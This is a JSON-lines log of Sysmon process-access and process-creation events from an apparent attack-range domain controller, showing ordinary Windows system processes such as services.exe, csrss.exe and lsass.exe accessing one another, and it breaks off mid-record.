{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1184,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00106FB80200}\r\nTargetProcessId: 2752\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00106FB80200}","TargetProcessId":"2752","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1185,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00106FB80200}\r\nTargetProcessId: 2752\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00106FB80200}","TargetProcessId":"2752","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1186,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.833\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2724\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00106FB80200}\r\nTargetProcessId: 2752\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.833","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"2724","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00106FB80200}","TargetProcessId":"2752","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1187,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.827\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nProcessId: 2748\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nFileVersion: 10.0.14393.0\r\nDescription: Microsoft.ActiveDirectory.WebServices\r\nProduct: Microsoft (R) Windows (R) Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Microsoft.ActiveDirectory.WebServices.exe\r\nCommandLine: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.827","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001066B80200}","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","FileVersion":"10.0.14393.0","Description":"Microsoft.ActiveDirectory.WebServices","Product":"Microsoft (R) Windows (R) Operating System","Company":"Microsoft Corporation","OriginalFileName":"Microsoft.ActiveDirectory.WebServices.exe","CommandLine":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1188,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.835\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1184\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.835","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1184","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001066B80200}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1189,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.835\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.835","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001066B80200}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1190,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.836\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.836","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1191,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.836\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.836","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1192,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.838\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.838","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1193,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.838\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 